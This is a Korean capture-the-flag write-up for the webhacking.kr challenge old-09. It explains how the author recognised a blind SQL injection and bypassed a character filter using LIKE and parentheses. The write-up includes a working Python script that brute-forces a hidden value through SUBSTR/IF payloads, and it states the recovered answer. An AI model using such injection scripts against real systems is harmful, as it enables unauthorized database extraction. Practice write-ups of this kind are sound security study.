old-09 (900)

첫 화면이다.

1과 2를 눌렀을 때 아래와 같이 각각 Apple, Banana가 출력된다.

URL: https://webhacking.kr/challenge/web-09/index.php?no=1

URL: https://webhacking.kr/challenge/web-09/index.php?no=2

3을 눌렀을 때 아래와 같은 메시지가 출력된다.

URL의 no 값을 1과 true 로 하였을 때는 Apple이 출력되고, 0과 false로 하였을 때는 아무것도 출력되지 않는다.

이를 통해 본 문제가 Blind SQL Injection과 관련된 문제라고 추측하였다.

no 값에 = 이나 % 같이 특수문자를 넣었을 때 Access Denied라는 문구가 뜨는 것을 통해 문자열이 필터링되고 있는 사실을 알 수 있다.

LIKE 구문과 괄호를 통해 이를 우회하여 코드를 작성하면 아래와 같다.

Password 제출 폼의 maxlength가 11이기 때문에 반복문을 11번만 실행하였다.

import requests
import string


def attack(query):
    URL = 'https://webhacking.kr/challenge/web-09/?no=' + query
    r = requests.get(URL)
    if 'Secret' in r.text:
        return True
    else:
        return False


pw = ''
for pos in range(1, 12):
    for character in string.printable:
        if attack(f'IF(SUBSTR(id,{pos},1)LIKE({hex(ord(character))}),3,0)') is True:
            pw += character
            break
print(pw)

실행 시켜보면 pw 값이 alsrkswhaql 로 도출되고, 이를 폼에 입력해 제출하면 문제가 풀린다.